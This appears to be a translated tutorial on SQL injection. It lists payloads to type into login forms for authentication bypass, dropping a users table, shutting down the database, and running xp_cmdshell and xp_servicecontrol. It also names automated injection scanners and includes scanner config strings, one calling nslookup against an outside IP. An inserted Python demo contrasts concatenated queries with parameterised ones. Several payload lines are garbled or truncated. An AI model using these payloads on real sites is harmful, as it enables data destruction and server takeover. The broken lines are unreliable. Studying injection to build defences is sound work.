Say More About SQL Injection

Most websites today build their own eye-catching interface around their content. To do this, they pull their content from a database and update the data held there. One of the most common back ends for web datastores is SQL.

A web application's input scripts often do little more than query a SQL database, located either on the web server itself or on a separate back-end system. One of the most cunning web application attacks involves hijacking the queries used by the input scripts themselves to gain control of the application or its data. One of the most effective mechanisms for doing this is the technique called "SQL Injection".

SQL Injection means placing malicious Transact-SQL into a query so that it performs unexpected operations. Usually the existing queries are simply edited to achieve the same result.
Transact-SQL is easy to manipulate with the placement of a single character; delivering the malicious snippet depends on the attacker's ingenuity.
Some of the characters commonly used for this include the single quote ('), the dash (-) and the semicolon (;). They have special meanings in Transact-SQL.
What can attackers do once they have hijacked SQL queries? Initially, they can gain access to data. With stealthier techniques, they can gain access as if they were legitimate users, or even find a way to take complete control of the web server or the back-end SQL system.

SQL Injection examples: to find where SQL injection errors occur, type some of the following strings into the form fields:
+ Log in:
- Authenticate without any credentials:
USER: 'OR "='
PASS: 'OR "='
- Authenticate with only a username:
USER: admin '-
- Authenticate as the first user in the users table:
USER: 'or 1 = 1--
- Authenticate as a fake user:
USER: 'union select 1,' user ',' passwd '1--
+ Destruction:
- Remove a table of data:
USER: '; drop table users--
- Shut down the database remotely:
USER: aaaaaaaaaaaaaaa '
PASS: '; shutdown--
+ Executing function calls and stored procedures:
- Run xp_cmdshell to get a directory listing:
http: // localhost / script? 0 '; EXEC + master ... # 39; dir';
- Run xp_servicecontrol to take over a service:
http: // localhost / script? 0 '; EXECT + maste ...; server';
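The effect of two of the login strings above, shown as an added example that is not part of the original article: the same login query built by string concatenation and with bound parameters. It runs on Python's sqlite3 with a constructed users table (table, column names and credentials are assumptions) rather than a Transact-SQL server, so only the quote and comment behaviour carries over.

```python
import sqlite3

def make_db():
    # Constructed sample data. Plaintext passwords only keep the demo short.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users "
               "(id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    db.executemany("INSERT INTO users (username, password) VALUES (?, ?)",
                   [("admin", "s3cret-admin"), ("alice", "s3cret-alice")])
    return db

def login_concat(db, user, password):
    """Vulnerable: form input becomes part of the SQL text itself."""
    sql = ("SELECT username FROM users WHERE username = '" + user +
           "' AND password = '" + password + "'")
    row = db.execute(sql).fetchone()
    return row[0] if row else None

def login_param(db, user, password):
    """Hardened: input is bound as data and is never parsed as SQL."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    row = db.execute(sql, (user, password)).fetchone()
    return row[0] if row else None

# Two login-field strings from the list above, written here with the
# full "--" comment marker and without the stray spaces.
PAYLOADS = ["' or 1=1--", "admin'--"]

def compare():
    """Return {payload: (concatenated result, parameterised result)}."""
    db = make_db()
    results = {}
    for payload in PAYLOADS:
        # The password value is irrelevant: in the concatenated query the
        # "--" turns the password check into a comment.
        results[payload] = (login_concat(db, payload, "x"),
                            login_param(db, payload, "x"))
    return results

if __name__ == "__main__":
    for payload, (vuln, safe) in compare().items():
        print(f"{payload!r}: concatenated -> {vuln}, parameterised -> {safe}")
```

With concatenation both strings log in as admin without a password; with bound parameters they are treated as odd-looking usernames that match no row.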
Not all of the syntax above works on every database. The following table shows, for ease of comparison, whether the methods outlined above will work on each database:

Database-specific information | MySQL                   | Oracle          | DB2 | Postgre | MSSQL
UNION possible                | Y                       | Y               | Y   | Y       | Y
Subselects possible           | N                       | Y               | Y   | Y       | Y
Multiple statements           | N (mostly)              | N               | N   | Y       | Y
Default stored procedures     | -                       | Many (utl_file) | -   | -       | M (cmdshell)
Other comments                | Supports "into outfile" | -               | -   | -       | -

Automatic SQL injection error detection tools:
SQL Injection is usually carried out by hand, but some tools can automatically identify and exploit vulnerabilities. Wpoison is a tool that can detect SQL Injection errors in web pages. SQL errors are stored in a dictionary file, so it is easy for anyone to add their own dictionary list. Wpoison runs on Linux and is available for download at:
http://wpoison.sourceforge.net
There is also the SPIKE Proxy tool, which has pretty good functionality: it performs SQL Injection automatically, and the strings it injects can be adapted to the user's habits. SPIKE Proxy is a Python and OpenSSL-based tool. At its core it works as an HTTP and HTTPS proxy. It gives web developers or web application administrators access to the entire web application, while also providing a group of automated tools and techniques to discover common errors, including SQL Injection, Website Crawler, Brute Forcer, Automated Overflow Detection, and more. For Linux, you can download it at:
www.immunitysec.com/spike.html
Note that this software is around 13M in size and your computer must have Python and OpenSSL available. This tool does not work on WinXP.

Mieliekoek.pl is a SQL Insertion Crawler, which checks forms for SQL errors. It takes the output of a web mirroring tool as input and looks at each file for the presence of forms. The injected strings can be easily changed in the configuration file. Download Mieliekoek at:
http://packetstormsecurity.nl/UNIX/security/mieliekoek.pl
This tool only works when your machine has Perl installed. Here is an example of output from mieliekoek:

$badstring = "blah'";
# $badstring = "blah' or 1 = 1 -";
$badstring = "blah' exec master..xp_cmdshell 'nslookup a.com 196.30.67.5' -";